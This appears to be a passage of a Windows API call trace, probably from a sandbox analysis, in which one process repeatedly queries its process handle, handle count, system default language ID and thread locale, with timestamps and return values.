[0147.784] GetCurrentProcess () returned 0xffffffff [0147.784] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.784] GetSystemDefaultLangID () returned 0x2730409 [0147.784] GetThreadLocale () returned 0x409 [0147.784] GetCurrentProcess () returned 0xffffffff [0147.784] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.784] GetSystemDefaultLangID () returned 0x2730409 [0147.784] GetThreadLocale () returned 0x409 [0147.784] GetCurrentProcess () returned 0xffffffff [0147.784] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.784] GetSystemDefaultLangID () returned 0x2730409 [0147.784] GetThreadLocale () returned 0x409 [0147.784] GetCurrentProcess () returned 0xffffffff [0147.784] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.784] GetSystemDefaultLangID () returned 0x2730409 [0147.785] GetThreadLocale () returned 0x409 [0147.785] GetCurrentProcess () returned 0xffffffff [0147.785] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.785] GetSystemDefaultLangID () returned 0x2730409 [0147.785] GetThreadLocale () returned 0x409 [0147.785] GetCurrentProcess () returned 0xffffffff [0147.785] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.785] GetSystemDefaultLangID () returned 0x2730409 [0147.785] GetThreadLocale () returned 0x409 [0147.785] GetCurrentProcess () returned 0xffffffff [0147.785] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.785] GetSystemDefaultLangID () returned 0x2730409 [0147.785] GetThreadLocale () returned 0x409 [0147.785] GetCurrentProcess () returned 0xffffffff [0147.785] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.785] GetSystemDefaultLangID () returned 0x2730409 [0147.785] GetThreadLocale () returned 0x409 [0147.785] GetCurrentProcess () returned 0xffffffff [0147.785] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.785] GetSystemDefaultLangID () returned 0x2730409 [0147.786] GetThreadLocale () returned 0x409 [0147.786] GetCurrentProcess () returned 0xffffffff [0147.786] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.786] GetSystemDefaultLangID () returned 0x2730409 [0147.786] GetThreadLocale () returned 0x409 [0147.786] GetCurrentProcess () returned 0xffffffff [0147.786] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.786] GetSystemDefaultLangID () returned 0x2730409 [0147.786] GetThreadLocale () returned 0x409 [0147.786] GetCurrentProcess () returned 0xffffffff [0147.786] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.786] GetSystemDefaultLangID () returned 0x2730409 [0147.786] GetThreadLocale () returned 0x409 [0147.786] GetCurrentProcess () returned 0xffffffff [0147.786] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.786] GetSystemDefaultLangID () returned 0x2730409 [0147.786] GetThreadLocale () returned 0x409 [0147.786] GetCurrentProcess () returned 0xffffffff [0147.786] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.786] GetSystemDefaultLangID () returned 0x2730409 [0147.786] GetThreadLocale () returned 0x409 [0147.786] GetCurrentProcess () returned 0xffffffff [0147.786] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.787] GetSystemDefaultLangID () returned 0x2730409 [0147.787] GetThreadLocale () returned 0x409 [0147.787] GetCurrentProcess () returned 0xffffffff [0147.787] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.787] GetSystemDefaultLangID () returned 0x2730409 [0147.787] GetThreadLocale () returned 0x409 [0147.787] GetCurrentProcess () returned 0xffffffff [0147.787] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.787] GetSystemDefaultLangID () returned 0x2730409 [0147.787] GetThreadLocale () returned 0x409 [0147.787] GetCurrentProcess () returned 0xffffffff [0147.787] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.787] GetSystemDefaultLangID () returned 0x2730409 [0147.787] GetThreadLocale () returned 0x409 [0147.787] GetCurrentProcess () returned 0xffffffff [0147.787] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.787] GetSystemDefaultLangID () returned 0x2730409 [0147.787] GetThreadLocale () returned 0x409 [0147.787] GetCurrentProcess () returned 0xffffffff [0147.787] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.787] GetSystemDefaultLangID () returned 0x2730409 [0147.787] GetThreadLocale () returned 0x409 [0147.787] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.788] GetSystemDefaultLangID () returned 0x2730409 [0147.788] GetThreadLocale () returned 0x409 [0147.788] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.788] GetSystemDefaultLangID () returned 0x2730409 [0147.788] GetThreadLocale () returned 0x409 [0147.788] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.788] GetSystemDefaultLangID () returned 0x2730409 [0147.788] GetThreadLocale () returned 0x409 [0147.788] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.788] GetSystemDefaultLangID () returned 0x2730409 [0147.788] GetThreadLocale () returned 0x409 [0147.788] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.788] GetSystemDefaultLangID () returned 0x2730409 [0147.788] GetThreadLocale () returned 0x409 [0147.788] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.788] GetSystemDefaultLangID () returned 0x2730409 [0147.788] GetThreadLocale () returned 0x409 [0147.788] GetCurrentProcess () returned 0xffffffff [0147.788] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.789] GetSystemDefaultLangID () returned 0x2730409 [0147.789] GetThreadLocale () returned 0x409 [0147.789] GetCurrentProcess () returned 0xffffffff [0147.789] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.789] GetSystemDefaultLangID () returned 0x2730409 [0147.789] GetThreadLocale () returned 0x409 [0147.789] GetCurrentProcess () returned 0xffffffff [0147.789] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.789] GetSystemDefaultLangID () returned 0x2730409 [0147.789] GetThreadLocale () returned 0x409 [0147.789] GetCurrentProcess () returned 0xffffffff [0147.789] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.789] GetSystemDefaultLangID () returned 0x2730409 [0147.789] GetThreadLocale () returned 0x409 [0147.789] GetCurrentProcess () returned 0xffffffff [0147.789] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.789] GetSystemDefaultLangID () returned 0x2730409 [0147.789] GetThreadLocale () returned 0x409 [0147.789] GetCurrentProcess () returned 0xffffffff [0147.789] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.789] GetSystemDefaultLangID () returned 0x2730409 [0147.789] GetThreadLocale () returned 0x409 [0147.789] GetCurrentProcess () returned 0xffffffff [0147.789] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.790] GetSystemDefaultLangID () returned 0x2730409 [0147.790] GetThreadLocale () returned 0x409 [0147.790] GetCurrentProcess () returned 0xffffffff [0147.790] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.790] GetSystemDefaultLangID () returned 0x2730409 [0147.790] GetThreadLocale () returned 0x409 [0147.790] GetCurrentProcess () returned 0xffffffff [0147.790] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.790] GetSystemDefaultLangID () returned 0x2730409 [0147.790] GetThreadLocale () returned 0x409 [0147.790] GetCurrentProcess () returned 0xffffffff [0147.790] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.790] GetSystemDefaultLangID () returned 0x2730409 [0147.790] GetThreadLocale () returned 0x409 [0147.790] GetCurrentProcess () returned 0xffffffff [0147.790] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.790] GetSystemDefaultLangID () returned 0x2730409 [0147.790] GetThreadLocale () returned 0x409 [0147.790] GetCurrentProcess () returned 0xffffffff [0147.790] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.790] GetSystemDefaultLangID () returned 0x2730409 [0147.790] GetThreadLocale () returned 0x409 [0147.790] GetCurrentProcess () returned 0xffffffff [0147.790] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.791] GetThreadLocale () returned 0x409 [0147.791] GetCurrentProcess () returned 0xffffffff [0147.791] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.791] GetThreadLocale () returned 0x409 [0147.791] GetCurrentProcess () returned 0xffffffff [0147.791] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.791] GetThreadLocale () returned 0x409 [0147.791] GetCurrentProcess () returned 0xffffffff [0147.791] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.791] GetThreadLocale () returned 0x409 [0147.791] GetCurrentProcess () returned 0xffffffff [0147.791] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.791] GetThreadLocale () returned 0x409 [0147.791] GetCurrentProcess () returned 0xffffffff [0147.791] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.791] GetThreadLocale () returned 0x409 [0147.791] GetCurrentProcess () returned 0xffffffff [0147.791] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.791] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.792] GetCurrentProcess () returned 0xffffffff [0147.792] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.792] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.792] GetCurrentProcess () returned 0xffffffff [0147.792] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.792] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.792] GetCurrentProcess () returned 0xffffffff [0147.792] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.792] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.792] GetCurrentProcess () returned 0xffffffff [0147.792] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.792] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.792] GetCurrentProcess () returned 0xffffffff [0147.792] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.792] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.792] GetCurrentProcess () returned 0xffffffff [0147.792] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.792] GetSystemDefaultLangID () returned 0x2730409 [0147.792] GetThreadLocale () returned 0x409 [0147.793] GetCurrentProcess () returned 0xffffffff [0147.793] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.793] GetSystemDefaultLangID () returned 0x2730409 [0147.793] GetThreadLocale () returned 0x409 [0147.793] GetCurrentProcess () returned 0xffffffff [0147.793] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.932] GetSystemDefaultLangID () returned 0x2730409 [0147.932] GetThreadLocale () returned 0x409 [0147.932] GetCurrentProcess () returned 0xffffffff [0147.932] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.933] GetSystemDefaultLangID () returned 0x2730409 [0147.933] GetThreadLocale () returned 0x409 [0147.933] GetCurrentProcess () returned 0xffffffff [0147.933] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.934] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.935] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.935] GetSystemDefaultLangID () returned 0x2730409 [0147.935] GetThreadLocale () returned 0x409 [0147.935] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.936] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.936] GetSystemDefaultLangID () returned 0x2730409 [0147.936] GetThreadLocale () returned 0x409 [0147.936] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.937] GetCurrentProcess () returned 0xffffffff [0147.937] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.937] GetSystemDefaultLangID () returned 0x2730409 [0147.937] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.938] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.938] GetSystemDefaultLangID () returned 0x2730409 [0147.938] GetThreadLocale () returned 0x409 [0147.938] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.939] GetSystemDefaultLangID () returned 0x2730409 [0147.939] GetThreadLocale () returned 0x409 [0147.939] GetCurrentProcess () returned 0xffffffff [0147.939] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.940] GetSystemDefaultLangID () returned 0x2730409 [0147.940] GetThreadLocale () returned 0x409 [0147.940] GetCurrentProcess () returned 0xffffffff [0147.940] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 